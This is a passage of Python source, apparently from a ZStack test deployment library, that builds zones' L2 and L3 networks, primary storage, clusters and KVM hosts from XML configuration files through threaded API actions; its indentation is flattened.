l2Network = zone.l2Networks.l2VlanNetwork
else:
if not xmlobject.has_element(zone, \
"l2Networks.l2NoVlanNetwork"):
return
l2Network = zone.l2Networks.l2NoVlanNetwork
if zone.duplication__ == None:
zone_dup = 1
else:
zone_dup = int(zone.duplication__)
for zone_ref in range(zone_dup):
zoneName = generate_dup_name(zone.name_, zone_ref, 'z')
zinvs = res_ops.get_resource(res_ops.ZONE, session_uuid, name=zoneName)
zinv = get_first_item_from_list(zinvs, 'Zone', zoneName, 'L2 network')
#can only deal with single cluster duplication case.
cluster = xmlobject.safe_list(zone.clusters.cluster)[0]
if cluster.duplication__ == None:
cluster_duplication = 1
else:
cluster_duplication = int(cluster.duplication__)
for cluster_ref in range(cluster_duplication):
for l2 in xmlobject.safe_list(l2Network):
if l2_name and l2_name != l2.name_:
continue
if not is_vlan or l2.duplication__ == None:
l2_dup = 1
else:
l2_dup = int(l2.duplication__)
for j in range(l2_dup):
l2Name = generate_dup_name(\
generate_dup_name(\
generate_dup_name(\
l2.name_, zone_ref, 'z')\
, cluster_ref, 'c')\
, j, 'n')
l2Des = generate_dup_name(\
generate_dup_name(\
generate_dup_name(\
l2.description_, zone_ref, 'z')\
, cluster_ref, 'c')\
, j, 'n')
if is_vlan:
l2_vlan = int(l2.vlan_) + j
if is_vlan:
action = api_actions.CreateL2VlanNetworkAction()
else:
action = api_actions.CreateL2NoVlanNetworkAction()
action.sessionUuid = session_uuid
action.name = l2Name
action.description = l2Des
if scenarioFile != None:
action.physicalInterface = l2.physicalInterface_.replace("eth", "zsn")
else:
action.physicalInterface = l2.physicalInterface_
action.zoneUuid = zinv.uuid
if is_vlan:
action.vlan = l2_vlan
thread = threading.Thread(\
target=_thread_for_action, \
args=(action,))
wait_for_thread_queue()
thread.start()
for zone in xmlobject.safe_list(deployConfig.zones.zone):
if zone_name and zone.name_ != zone_name:
continue
_deploy_l2_network(zone, False)
_deploy_l2_network(zone, True)
_deploy_l2_vxlan_network(zone)
wait_for_thread_done()
def get_primary_storage_from_scenario_file(primaryStorageRefName, scenarioConfig, scenarioFile, deployConfig):
if scenarioConfig == None or scenarioFile == None or not os.path.exists(scenarioFile):
return []
ip_list = []
for host in xmlobject.safe_list(scenarioConfig.deployerConfig.hosts.host):
for vm in xmlobject.safe_list(host.vms.vm):
if xmlobject.has_element(vm, 'primaryStorageRef'):
#if vm.primaryStorageRef.text_ == primaryStorageRefName:
if isinstance(vm.primaryStorageRef,list):
for ps_each in vm.primaryStorageRef:
if ps_each.text_ == primaryStorageRefName:
with open(scenarioFile, 'r') as fd:
xmlstr = fd.read()
fd.close()
scenario_file = xmlobject.loads(xmlstr)
for s_vm in xmlobject.safe_list(scenario_file.vms.vm):
if s_vm.name_ == vm.name_:
if xmlobject.has_element(vm, 'backupStorageRef') and vm.backupStorageRef.type_ == 'ceph':
nic_id = get_ceph_storages_mon_nic_id(vm.backupStorageRef.text_, scenarioConfig)
if nic_id == None:
ip_list.append(s_vm.ip_)
else:
ip_list.append(s_vm.ips.ip[nic_id].ip_)
else:
ip_list.append(s_vm.ip_)
else:
if vm.primaryStorageRef.text_ == primaryStorageRefName:
with open(scenarioFile, 'r') as fd:
xmlstr = fd.read()
fd.close()
scenario_file = xmlobject.loads(xmlstr)
for s_vm in xmlobject.safe_list(scenario_file.vms.vm):
if s_vm.name_ == vm.name_:
if vm.backupStorageRef.type_ == 'ceph':
nic_id = get_ceph_storages_mon_nic_id(vm.backupStorageRef.text_, scenarioConfig)
if nic_id == None:
ip_list.append(s_vm.ip_)
else:
ip_list.append(s_vm.ips.ip[nic_id].ip_)
else:
ip_list.append(s_vm.ip_)
return ip_list
#Add Primary Storage
def add_primary_storage(scenarioConfig, scenarioFile, deployConfig, session_uuid, ps_name = None, \
zone_name = None):
if not xmlobject.has_element(deployConfig, 'zones.zone'):
test_util.test_logger('Not find zones.zone in config, skip primary storage deployment')
return
def _generate_sim_ps_action(zone, pr, zone_ref, cluster_ref):
if zone_ref == 0:
zone_name = zone.name_
else:
zone_name = generate_dup_name(zone.name_, zone_ref, 'z')
zinvs = res_ops.get_resource(res_ops.ZONE, session_uuid, name=zone_name)
zinv = get_first_item_from_list(zinvs, 'Zone', zone_name, 'primary storage')
action = api_actions.AddSimulatorPrimaryStorageAction()
action.sessionUuid = session_uuid
action.name = generate_dup_name(generate_dup_name(pr.name_, zone_ref, 'z'), cluster_ref, 'c')
action.description = generate_dup_name(generate_dup_name(pr.description__, zone_ref, 'zone'), cluster_ref, 'cluster')
action.url = generate_dup_name(generate_dup_name(pr.url_, zone_ref, 'z'), cluster_ref, 'c')
action.type = inventory.SIMULATOR_PRIMARY_STORAGE_TYPE
action.zoneUuid = zinv.uuid
action.totalCapacity = sizeunit.get_size(pr.totalCapacity_)
action.totalPhysicalCapacity = sizeunit.get_size(pr.totalCapacity_)
action.availableCapacity = sizeunit.get_size(pr.availableCapacity_)
action.availablePhysicalCapacity = sizeunit.get_size(pr.availableCapacity_)
return action
def _deploy_primary_storage(zone):
if xmlobject.has_element(zone, 'primaryStorages.IscsiFileSystemBackendPrimaryStorage'):
zinvs = res_ops.get_resource(res_ops.ZONE, session_uuid, \
name=zone.name_)
zinv = get_first_item_from_list(zinvs, 'Zone', zone.name_, 'primary storage')
for pr in xmlobject.safe_list(zone.primaryStorages.IscsiFileSystemBackendPrimaryStorage):
if ps_name and ps_name != pr.name_:
continue
action = api_actions.AddIscsiFileSystemBackendPrimaryStorageAction()
action.sessionUuid = session_uuid
action.name = pr.name_
action.description = pr.description__
action.type = inventory.ISCSI_FILE_SYSTEM_BACKEND_PRIMARY_STORAGE_TYPE
action.url = pr.url_
action.zoneUuid = zinv.uuid
action.chapPassword = pr.chapPassword_
action.chapUsername = pr.chapUsername_
action.sshPassword = pr.sshPassword_
action.sshUsername = pr.sshUsername_
action.hostname = pr.hostname_
action.filesystemType = pr.filesystemType_
thread = threading.Thread(target=_thread_for_action, args=(action,))
wait_for_thread_queue()
thread.start()
if xmlobject.has_element(zone, 'primaryStorages.localPrimaryStorage'):
zinvs = res_ops.get_resource(res_ops.ZONE, session_uuid, \
name=zone.name_)
zinv = get_first_item_from_list(zinvs, 'Zone', zone.name_, 'primary storage')
for pr in xmlobject.safe_list(zone.primaryStorages.localPrimaryStorage):
if ps_name and ps_name != pr.name_:
continue
action = api_actions.AddLocalPrimaryStorageAction()
action.sessionUuid = session_uuid
action.name = pr.name_
action.description = pr.description__
action.type = inventory.LOCAL_STORAGE_TYPE
action.url = pr.url_
action.zoneUuid = zinv.uuid
thread = threading.Thread(target=_thread_for_action, args=(action,))
wait_for_thread_queue()
thread.start()
if xmlobject.has_element(zone, 'primaryStorages.cephPrimaryStorage'):
zinvs = res_ops.get_resource(res_ops.ZONE, session_uuid, \
name=zone.name_)
zinv = get_first_item_from_list(zinvs, 'Zone', zone.name_, 'primary storage')
for pr in xmlobject.safe_list(zone.primaryStorages.cephPrimaryStorage):
if ps_name and ps_name != pr.name_:
continue
action = api_actions.AddCephPrimaryStorageAction()
action.sessionUuid = session_uuid
action.name = pr.name_
action.description = pr.description__
action.type = inventory.CEPH_PRIMARY_STORAGE_TYPE
hostname_list = get_primary_storage_from_scenario_file(pr.name_, scenarioConfig, scenarioFile, deployConfig)
if len(hostname_list) != 0:
action.monUrls = []
for hostname in hostname_list:
action.monUrls.append("root:password@%s" % (hostname))
else:
action.monUrls = pr.monUrls_.split(';')
if pr.dataVolumePoolName__:
action.dataVolumePoolName = pr.dataVolumePoolName__
if pr.rootVolumePoolName__:
action.rootVolumePoolName = pr.rootVolumePoolName__
if pr.imageCachePoolName__:
action.imageCachePoolName = pr.imageCachePoolName__
action.zoneUuid = zinv.uuid
thread = threading.Thread(target=_thread_for_action, args=(action,))
wait_for_thread_queue()
thread.start()
if xmlobject.has_element(zone, 'primaryStorages.xskyPrimaryStorage'):
zinvs = res_ops.get_resource(res_ops.ZONE, session_uuid, \
name=zone.name_)
zinv = get_first_item_from_list(zinvs, 'Zone', zone.name_, 'primary storage')
for pr in xmlobject.safe_list(zone.primaryStorages.xskyPrimaryStorage):
if ps_name and ps_name != pr.name_:
continue
action = api_actions.AddXSkyPrimaryStorageAction()
action.sessionUuid = session_uuid
action.name = pr.name_
action.description = pr.description__
action.type = inventory.XSKY_PRIMARY_STORAGE_TYPE
hostname_list = get_primary_storage_from_scenario_file(pr.name_, scenarioConfig, scenarioFile, deployConfig)
if len(hostname_list) != 0:
action.monUrls = []
for hostname in hostname_list:
action.monUrls.append("root:password@%s" % (hostname))
else:
if pr.monUrls_.find(';') == -1:
action.monUrls = [pr.monUrls_]
else:
action.monUrls = pr.monUrls_.split(';')
if pr.dataVolumePoolName__:
action.dataVolumePoolName = pr.dataVolumePoolName__
if pr.rootVolumePoolName__:
action.rootVolumePoolName = pr.rootVolumePoolName__
if pr.imageCachePoolName__:
action.imageCachePoolName = pr.imageCachePoolName__
action.zoneUuid = zinv.uuid
thread = threading.Thread(target=_thread_for_action, args=(action,))
wait_for_thread_queue()
thread.start()
if xmlobject.has_element(zone, 'primaryStorages.fusionstorPrimaryStorage'):
zinvs = res_ops.get_resource(res_ops.ZONE, session_uuid, \
name=zone.name_)
zinv = get_first_item_from_list(zinvs, 'Zone', zone.name_, 'primary storage')
for pr in xmlobject.safe_list(zone.primaryStorages.fusionstorPrimaryStorage):
if ps_name and ps_name != pr.name_:
continue
action = api_actions.AddFusionstorPrimaryStorageAction()
action.sessionUuid = session_uuid
action.name = pr.name_
action.description = pr.description__
action.type = inventory.FUSIONSTOR_PRIMARY_STORAGE_TYPE
hostname_list = get_primary_storage_from_scenario_file(pr.name_, scenarioConfig, scenarioFile, deployConfig)
if len(hostname_list) != 0:
action.monUrls = []
for hostname in hostname_list:
action.monUrls.append("root:password@%s" % (hostname))
else:
action.monUrls = pr.monUrls_.split(';')
if pr.dataVolumePoolName__:
action.dataVolumePoolName = pr.dataVolumePoolName__
if pr.rootVolumePoolName__:
action.rootVolumePoolName = pr.rootVolumePoolName__
if pr.imageCachePoolName__:
action.imageCachePoolName = pr.imageCachePoolName__
action.zoneUuid = zinv.uuid
thread = threading.Thread(target=_thread_for_action, args=(action,))
wait_for_thread_queue()
thread.start()
if xmlobject.has_element(zone, 'primaryStorages.nfsPrimaryStorage'):
zinvs = res_ops.get_resource(res_ops.ZONE, session_uuid, \
name=zone.name_)
zinv = get_first_item_from_list(zinvs, 'Zone', zone.name_, 'primary storage')
for pr in xmlobject.safe_list(zone.primaryStorages.nfsPrimaryStorage):
if ps_name and ps_name != pr.name_:
continue
action = api_actions.AddNfsPrimaryStorageAction()
action.sessionUuid = session_uuid
action.name = pr.name_
action.description = pr.description__
action.type = inventory.NFS_PRIMARY_STORAGE_TYPE
hostname_list = get_primary_storage_from_scenario_file(pr.name_, scenarioConfig, scenarioFile, deployConfig)
if len(hostname_list) != 0:
action.url = "%s:%s" % (hostname_list[0], pr.url_.split(':')[1])
cadidate_ip = get_nfs_ip_for_seperate_network(scenarioConfig, hostname_list[0], pr.name_)
if cadidate_ip:
action.url = "%s:%s" % (cadidate_ip, pr.url_.split(':')[1])
else:
action.url = pr.url_
action.zoneUuid = zinv.uuid
thread = threading.Thread(target=_thread_for_action, args=(action,))
wait_for_thread_queue()
thread.start()
if xmlobject.has_element(zone, 'primaryStorages.simulatorPrimaryStorage'):
if zone.duplication__ == None:
duplication = 1
else:
duplication = int(zone.duplication__)
for pr in xmlobject.safe_list(zone.primaryStorages.simulatorPrimaryStorage):
for zone_ref in range(duplication):
for cluster in xmlobject.safe_list(zone.clusters.cluster):
for pref in xmlobject.safe_list(cluster.primaryStorageRef):
if pref.text_ == pr.name_:
if cluster.duplication__ == None:
cluster_duplication = 1
else:
cluster_duplication = int(cluster.duplication__)
for cluster_ref in range(cluster_duplication):
action = _generate_sim_ps_action(zone, pr, zone_ref, cluster_ref)
thread = threading.Thread(target=_thread_for_action, args=(action,))
wait_for_thread_queue()
thread.start()
if xmlobject.has_element(zone, 'primaryStorages.sharedMountPointPrimaryStorage'):
zinvs = res_ops.get_resource(res_ops.ZONE, session_uuid, \
name=zone.name_)
zinv = get_first_item_from_list(zinvs, 'Zone', zone.name_, 'primary storage')
for pr in xmlobject.safe_list(zone.primaryStorages.sharedMountPointPrimaryStorage):
if ps_name and ps_name != pr.name_:
continue
action = api_actions.AddSharedMountPointPrimaryStorageAction()
action.sessionUuid = session_uuid
action.name = pr.name_
action.description = pr.description__
action.url = pr.url_
action.zoneUuid = zinv.uuid
thread = threading.Thread(target=_thread_for_action, args=(action,))
wait_for_thread_queue()
thread.start()
for zone in xmlobject.safe_list(deployConfig.zones.zone):
if zone_name and zone.name_ != zone_name:
continue
_deploy_primary_storage(zone)
wait_for_thread_done()
#Add Cluster
def add_cluster(scenarioConfig, scenarioFile, deployConfig, session_uuid, cluster_name = None, \
zone_name = None):
if not xmlobject.has_element(deployConfig, "zones.zone"):
return
def _add_cluster(action, zone_ref, cluster, cluster_ref):
evt = action.run()
test_util.test_logger(jsonobject.dumps(evt))
cinv = evt.inventory
try:
if xmlobject.has_element(cluster, 'primaryStorageRef'):
for pref in xmlobject.safe_list(cluster.primaryStorageRef):
ps_name = generate_dup_name(generate_dup_name(pref.text_, zone_ref, 'z'), cluster_ref, 'c')
pinvs = res_ops.get_resource(res_ops.PRIMARY_STORAGE, session_uuid, name=ps_name)
pinv = get_first_item_from_list(pinvs, 'Primary Storage', ps_name, 'Cluster')
action_ps = api_actions.AttachPrimaryStorageToClusterAction()
action_ps.sessionUuid = session_uuid
action_ps.clusterUuid = cinv.uuid
action_ps.primaryStorageUuid = pinv.uuid
evt = action_ps.run()
test_util.test_logger(jsonobject.dumps(evt))
except:
exc_info.append(sys.exc_info())
if cluster.allL2NetworkRef__ == 'true':
#find all L2 network in zone and attach to cluster
cond = res_ops.gen_query_conditions('zoneUuid', '=', \
action.zoneUuid)
l2_count = res_ops.query_resource_count(res_ops.L2_NETWORK, \
cond, session_uuid)
l2invs = res_ops.query_resource_fields(res_ops.L2_NETWORK, \
[{'name':'zoneUuid', 'op':'=', 'value':action.zoneUuid}], \
session_uuid, ['uuid'], 0, l2_count)
else:
l2invs = []
if xmlobject.has_element(cluster, 'l2NetworkRef'):
for l2ref in xmlobject.safe_list(cluster.l2NetworkRef):
l2_name = generate_dup_name(generate_dup_name(l2ref.text_, zone_ref, 'z'), cluster_ref, 'c')
cond = res_ops.gen_query_conditions('zoneUuid', '=', \
action.zoneUuid)
cond = res_ops.gen_query_conditions('name', '=', l2_name, \
cond)
l2inv = res_ops.query_resource_fields(res_ops.L2_NETWORK, \
cond, session_uuid, ['uuid'])
if not l2inv:
raise test_util.TestError("Can't find l2 network [%s] in database." % l2_name)
l2invs.extend(l2inv)
for l2inv in l2invs:
action = api_actions.AttachL2NetworkToClusterAction()
action.sessionUuid = session_uuid
action.clusterUuid = cinv.uuid
action.l2NetworkUuid = l2inv.uuid
thread = threading.Thread(target=_thread_for_action, args=(action,))
wait_for_thread_queue()
thread.start()
#def _add_l2VxlanNetwork(zone_uuid, zone_ref, cluster, cluster_ref, cluster_uuid):
def _add_l2VxlanNetwork(zone_uuid, cluster, cluster_uuid):
if xmlobject.has_element(cluster, 'l2VxlanNetworkPoolRef'):
for l2vxlanpoolref in xmlobject.safe_list(cluster.l2VxlanNetworkPoolRef):
l2_vxlan_pool_name = l2vxlanpoolref.text_
poolinvs = res_ops.get_resource(res_ops.L2_VXLAN_NETWORK_POOL, session_uuid, name=l2_vxlan_pool_name)
poolinv = get_first_item_from_list(poolinvs, 'L2 Vxlan Network Pool', l2_vxlan_pool_name, 'Cluster')
l2_vxlan_pool_name = l2vxlanpoolref.text_
action_vxlan = api_actions.AttachL2NetworkToClusterAction()
action_vxlan.l2NetworkUuid = poolinv.uuid
action_vxlan.clusterUuid = cluster_uuid
action_vxlan.systemTags = ["l2NetworkUuid::%s::clusterUuid::%s::cidr::{%s}" % (poolinv.uuid, cluster_uuid, l2vxlanpoolref.cidr_)]
action_vxlan.sessionUuid = session_uuid
evt = action_vxlan.run()
if xmlobject.has_element(zone.l2Networks, 'l2VxlanNetwork'):
for l2_vxlan in xmlobject.safe_list(zone.l2Networks.l2VxlanNetwork):
if xmlobject.has_element(l2_vxlan, 'l2VxlanNetworkPoolRef'):
l2_vxlan_invs = res_ops.get_resource(res_ops.L2_VXLAN_NETWORK, session_uuid, name=l2_vxlan.name_)
if len(l2_vxlan_invs) > 0:
continue
l2_vxlan_pool_name = l2vxlanpoolref.text_
poolinvs = res_ops.get_resource(res_ops.L2_VXLAN_NETWORK_POOL, session_uuid, name=l2_vxlan_pool_name)
poolinv = get_first_item_from_list(poolinvs, 'L2 Vxlan Network Pool', l2_vxlan_pool_name, 'Cluster')
test_util.test_logger("vxlan@@:%s" %(l2_vxlan.name_))
action_vxlan = api_actions.CreateL2VxlanNetworkAction()
action_vxlan.poolUuid = poolinv.uuid
action_vxlan.name = l2_vxlan.name_
action_vxlan.zoneUuid = zone_uuid
action_vxlan.sessionUuid = session_uuid
evt = action_vxlan.run()
#if clustVer.allL2NetworkRef__ == 'true':
# #find all L2 Vxlan network in zone and attach to cluster
# cond = res_ops.gen_query_conditions('zoneUuid', '=', \
# zone_uuid)
# l2_count = res_ops.query_resource_count(res_ops.L2_VXLAN_NETWORK, \
# cond, session_uuid)
# l2invs = res_ops.query_resource_fields(res_ops.L2_VXLAN_NETWORK, \
# [{'name':'zoneUuid', 'op':'=', 'value':zone_uuid}], \
# session_uuid, ['uuid'], 0, l2_count)
#else:
# l2invs = []
# if xmlobject.has_element(cluster, 'l2NetworkRef'):
# for l2ref in xmlobject.safe_list(cluster.l2NetworkRef):
# l2_name = generate_dup_name(generate_dup_name(l2ref.text_, zone_ref, 'z'), cluster_ref, 'c')
# cond = res_ops.gen_query_conditions('zoneUuid', '=', \
# zone_uuid)
# cond = res_ops.gen_query_conditions('name', '=', l2_name, \
# cond)
#
# l2inv = res_ops.query_resource_fields(res_ops.L2_VXLAN_NETWORK, \
# cond, session_uuid, ['uuid'])
# if not l2inv:
# raise test_util.TestError("Can't find l2 network [%s] in database." % l2_name)
# l2invs.extend(l2inv)
#for l2inv in l2invs:
# action = api_actions.AttachL2NetworkToClusterAction()
# action.sessionUuid = session_uuid
# action.clusterUuid = cluster_uuid
# action.l2NetworkUuid = l2inv.uuid
# thread = threading.Thread(target=_thread_for_action, args=(action,))
# wait_for_thread_queue()
# thread.start()
def _deploy_cluster(zone):
if not xmlobject.has_element(zone, "clusters.cluster"):
return
if zone.duplication__ == None:
zone_duplication = 1
else:
zone_duplication = int(zone.duplication__)
for zone_ref in range(zone_duplication):
for cluster in xmlobject.safe_list(zone.clusters.cluster):
if cluster_name and cluster_name != cluster.name_:
continue
if cluster.duplication__ == None:
cluster_duplication = 1
else:
cluster_duplication = int(cluster.duplication__)
for cluster_ref in range(cluster_duplication):
zone_name = generate_dup_name(zone.name_, zone_ref, 'z')
zinvs = res_ops.get_resource(res_ops.ZONE, session_uuid, name=zone_name)
zinv = get_first_item_from_list(zinvs, 'Zone', zone_name, 'Cluster')
action = api_actions.CreateClusterAction()
action.sessionUuid = session_uuid
action.name = generate_dup_name(generate_dup_name(cluster.name_, zone_ref, 'z'), cluster_ref, 'c')
action.description = generate_dup_name(generate_dup_name(cluster.description__, zone_ref, 'z'), cluster_ref, 'c')
action.hypervisorType = cluster.hypervisorType_
action.zoneUuid = zinv.uuid
thread = threading.Thread(target=_add_cluster, args=(action, zone_ref, cluster, cluster_ref, ))
wait_for_thread_queue()
thread.start()
for zone in xmlobject.safe_list(deployConfig.zones.zone):
if zone_name and zone_name != zone.name_:
continue
_deploy_cluster(zone)
wait_for_thread_done()
for zone in xmlobject.safe_list(deployConfig.zones.zone):
if zone_name and zone_name != zone.name_:
continue
if zone.duplication__ == None:
zone_duplication = 1
else:
zone_duplication = int(zone.duplication__)
for zone_ref in range(zone_duplication):
for cluster in xmlobject.safe_list(zone.clusters.cluster):
if cluster_name and cluster_name != cluster.name_:
continue
if cluster.duplication__ == None:
cluster_duplication = 1
else:
cluster_duplication = int(cluster.duplication__)
for cluster_ref in range(cluster_duplication):
zone_name = generate_dup_name(zone.name_, zone_ref, 'z')
zinvs = res_ops.get_resource(res_ops.ZONE, session_uuid, name=zone_name)
zinv = get_first_item_from_list(zinvs, 'Zone', zone_name, 'Cluster')
cinvs = res_ops.get_resource(res_ops.CLUSTER, session_uuid, name=cluster.name_)
cinv = get_first_item_from_list(cinvs, 'Cluster', cluster.name_, '_add_l2VxlanNetwork')
_add_l2VxlanNetwork(zinv.uuid, cluster, cinv.uuid)
def get_node_from_scenario_file(nodeRefName, scenarioConfig, scenarioFile, deployConfig):
if scenarioConfig == None or scenarioFile == None or not os.path.exists(scenarioFile):
return None
for host in xmlobject.safe_list(scenarioConfig.deployerConfig.hosts.host):
for vm in xmlobject.safe_list(host.vms.vm):
if xmlobject.has_element(vm, 'nodeRef'):
if vm.nodeRef.text_ == nodeRefName:
with open(scenarioFile, 'r') as fd:
xmlstr = fd.read()
fd.close()
scenario_file = xmlobject.loads(xmlstr)
for s_vm in xmlobject.safe_list(scenario_file.vms.vm):
if s_vm.name_ == vm.name_:
return s_vm.ip_
return None
def get_nodes_from_scenario_file(scenarioConfig, scenarioFile, deployConfig):
if scenarioConfig == None or scenarioFile == None or not os.path.exists(scenarioFile):
return None
nodes_ip = ''
for host in xmlobject.safe_list(scenarioConfig.deployerConfig.hosts.host):
for vm in xmlobject.safe_list(host.vms.vm):
if xmlobject.has_element(vm, 'nodeRef'):
with open(scenarioFile, 'r') as fd:
xmlstr = fd.read()
fd.close()
scenario_file = xmlobject.loads(xmlstr)
for s_vm in xmlobject.safe_list(scenario_file.vms.vm):
if s_vm.name_ == vm.name_:
nodes_ip += ' %s' % s_vm.ip_
return nodes_ip
def get_host_from_scenario_file(hostRefName, scenarioConfig, scenarioFile, deployConfig):
if scenarioConfig == None or scenarioFile == None or not os.path.exists(scenarioFile):
return None
for host in xmlobject.safe_list(scenarioConfig.deployerConfig.hosts.host):
for vm in xmlobject.safe_list(host.vms.vm):
if xmlobject.has_element(vm, 'hostRef'):
if vm.hostRef.text_ == hostRefName:
with open(scenarioFile, 'r') as fd:
xmlstr = fd.read()
fd.close()
scenario_file = xmlobject.loads(xmlstr)
for s_vm in xmlobject.safe_list(scenario_file.vms.vm):
if s_vm.name_ == vm.name_:
if s_vm.managementIp_ != s_vm.ip_:
return s_vm.managementIp_
else:
return s_vm.ip_
return None
def get_host_obj_from_scenario_file(hostRefName, scenarioConfig, scenarioFile, deployConfig):
if scenarioConfig == None or scenarioFile == None or not os.path.exists(scenarioFile):
return None
for host in xmlobject.safe_list(scenarioConfig.deployerConfig.hosts.host):
for vm in xmlobject.safe_list(host.vms.vm):
if xmlobject.has_element(vm, 'hostRef'):
if vm.hostRef.text_ == hostRefName:
with open(scenarioFile, 'r') as fd:
xmlstr = fd.read()
fd.close()
scenario_file = xmlobject.loads(xmlstr)
for s_vm in xmlobject.safe_list(scenario_file.vms.vm):
if s_vm.name_ == vm.name_:
return s_vm
return None
#Add Host
def add_host(scenarioConfig, scenarioFile, deployConfig, session_uuid, host_ip = None, zone_name = None, \
cluster_name = None):
'''
Base on an xml deploy config object to add hosts.
If providing giving zone_name, cluster_name or host_ip, this function will
only add related hosts.
'''
if not xmlobject.has_element(deployConfig, "zones.zone"):
return
def _deploy_host(cluster, zone_ref, cluster_ref):
if not xmlobject.has_element(cluster, "hosts.host"):
return
if zone_ref == 0 and cluster_ref == 0:
cluster_name = cluster.name_
else:
cluster_name = generate_dup_name(generate_dup_name(cluster.name_, zone_ref, 'z'), cluster_ref, 'c')
cinvs = res_ops.get_resource(res_ops.CLUSTER, session_uuid, name=cluster_name)
cinv = get_first_item_from_list(cinvs, 'Cluster', cluster_name, 'L3 network')
for host in xmlobject.safe_list(cluster.hosts.host):
if host_ip and host_ip != host.managementIp_:
continue
if host.duplication__ == None:
host_duplication = 1
else:
host_duplication = int(host.duplication__)
for i in range(host_duplication):
if cluster.hypervisorType_ == inventory.KVM_HYPERVISOR_TYPE:
action = api_actions.AddKVMHostAction()
action.username = host.username_
action.password = host.password_
if hasattr(host, 'port_'):
action.port = host.port_
action.sshport = host.port_
action.sshPort = host.port_
action.timeout = AddKVMHostTimeOut
elif cluster.hypervisorType_ == inventory.SIMULATOR_HYPERVISOR_TYPE:
action = api_actions.AddSimulatorHostAction()
action.cpuCapacity = host.cpuCapacity_
action.memoryCapacity = sizeunit.get_size(host.memoryCapacity_)
action.sessionUuid = session_uuid
action.clusterUuid = cinv.uuid
action.hostTags = host.hostTags__
if zone_ref == 0 and cluster_ref == 0 and i == 0:
action.name = host.name_
action.description = host.description__
managementIp = get_host_from_scenario_file(host.name_, scenarioConfig, scenarioFile, deployConfig)
if managementIp != None:
action.managementIp = managementIp
else:
action.managementIp = host.managementIp_
else:
action.name = generate_dup_name(generate_dup_name(generate_dup_name(host.name_, zone_ref, 'z'), cluster_ref, 'c'), i, 'h')
action.description = generate_dup_name(generate_dup_name(generate_dup_name(host.description__, zone_ref, 'z'), cluster_ref, 'c'), i, 'h')
action.managementIp = generate_dup_host_ip(host.managementIp_, zone_ref, cluster_ref, i)
thread = threading.Thread(target=_thread_for_action, args = (action, ))
wait_for_thread_queue()
thread.start()
for zone in xmlobject.safe_list(deployConfig.zones.zone):
if zone_name and zone_name != zone.name_:
continue
if not xmlobject.has_element(zone, 'clusters.cluster'):
continue
if zone.duplication__ == None:
zone_duplication = 1
else:
zone_duplication = int(zone.duplication__)
for zone_ref in range(zone_duplication):
for cluster in xmlobject.safe_list(zone.clusters.cluster):
if cluster_name and cluster_name != cluster.name_:
continue
if cluster.duplication__ == None:
cluster_duplication = 1
else:
cluster_duplication = int(cluster.duplication__)
for cluster_ref in range(cluster_duplication):
_deploy_host(cluster, zone_ref, cluster_ref)
wait_for_thread_done()
test_util.test_logger('All add KVM host actions are done.')
#Add L3 network
def add_l3_network(scenarioConfig, scenarioFile, deployConfig, session_uuid, l3_name = None, l2_name = None, \
zone_name = None):
'''
add_l3_network will add L3 network and also add related DNS, IpRange and
network services.
'''
if not xmlobject.has_element(deployConfig, "zones.zone"):
return
def _deploy_l3_network(l2, zone_ref, cluster_ref):
if not xmlobject.has_element(l2, "l3Networks.l3BasicNetwork"):
return
if not l2.duplication__:
l2_dup = 1
else:
l2_dup = int(l2.duplication__)
for l2_num in range(l2_dup):
for l3 in xmlobject.safe_list(l2.l3Networks.l3BasicNetwork):
if l3_name and l3_name != l3.name_:
continue
l2Name = generate_dup_name(generate_dup_name(generate_dup_name(l2.name_, zone_ref, 'z'), cluster_ref, 'c'), l2_num, 'n')
l3Name = generate_dup_name(generate_dup_name(generate_dup_name(l3.name_, zone_ref, 'z'), cluster_ref, 'c'), l2_num, 'n')
l2invs = res_ops.get_resource(res_ops.L2_NETWORK, \
session_uuid, \
name=l2Name)
l2inv = get_first_item_from_list(l2invs, \
'L2 Network', l2Name, 'L3 Network')
thread = threading.Thread(target=_do_l3_deploy, \
args=(l3, l2inv.uuid, l3Name, session_uuid, ))
wait_for_thread_queue()
thread.start()
def _do_l3_deploy(l3, l2inv_uuid, l3Name, session_uuid):
action = api_actions.CreateL3NetworkAction()
action.sessionUuid = session_uuid
action.description = l3.description__
if l3.system__ and l3.system__ != 'False':
action.system = 'true'
action.l2NetworkUuid = l2inv_uuid
action.name = l3Name
action.type = inventory.L3_BASIC_NETWORK_TYPE
if l3.domain_name__:
action.dnsDomain = l3.domain_name__
try:
evt = action.run()
except:
exc_info.append(sys.exc_info())
test_util.test_logger(jsonobject.dumps(evt))
l3_inv = evt.inventory
#add dns
if xmlobject.has_element(l3, 'dns'):
for dns in xmlobject.safe_list(l3.dns):
action = api_actions.AddDnsToL3NetworkAction()
action.sessionUuid = session_uuid
action.dns = dns.text_
action.l3NetworkUuid = l3_inv.uuid
try:
evt = action.run()
except:
exc_info.append(sys.exc_info())
test_util.test_logger(jsonobject.dumps(evt))
#add ip range.
if xmlobject.has_element(l3, 'ipRange'):
do_add_ip_range(l3.ipRange, l3_inv.uuid, session_uuid)
#add network service.
providers = {}
action = api_actions.QueryNetworkServiceProviderAction()
action.sessionUuid = session_uuid
action.conditions = []
try:
reply = action.run()
except:
exc_info.append(sys.exc_info())
for pinv in reply:
providers[pinv.name] = pinv.uuid
if xmlobject.has_element(l3, 'networkService'):
do_add_network_service(l3.networkService, l3_inv.uuid, \
providers, session_uuid)
for zone in xmlobject.safe_list(deployConfig.zones.zone):
if zone_name and zone_name != zone.name_:
continue
l2networks = []
if xmlobject.has_element(zone, 'l2Networks.l2NoVlanNetwork'):
l2networks.extend(xmlobject.safe_list(zone.l2Networks.l2NoVlanNetwork))
if xmlobject.has_element(zone, 'l2Networks.l2VlanNetwork'):
l2networks.extend(xmlobject.safe_list(zone.l2Networks.l2VlanNetwork))
if xmlobject.has_element(zone, 'l2Networks.l2VxlanNetwork'):
l2networks.extend(xmlobject.safe_list(zone.l2Networks.l2VxlanNetwork))
for l2 in l2networks:
if l2_name and l2_name != l2.name_:
continue
if zone.duplication__ == None:
duplication = 1
else:
duplication = int(zone.duplication__)
if duplication == 1:
_deploy_l3_network(l2, 0, 0)
else:
for zone_ref in range(duplication):
for cluster in xmlobject.safe_list(zone.clusters.cluster):
if cluster.duplication__ == None:
cluster_duplication = 1
else:
cluster_duplication = int(cluster.duplication__)
for cluster_ref in range(cluster_duplication):
if zone_ref == 1 and cluster_ref == 1:
zone_ref = 0
cluster_ref = 0
_deploy_l3_network(l2, zone_ref, cluster_ref)
wait_for_thread_done()
test_util.test_logger('All add L3 Network actions are done.')
#Add Iprange
def add_ip_range(deployConfig, session_uuid, ip_range_name = None, \
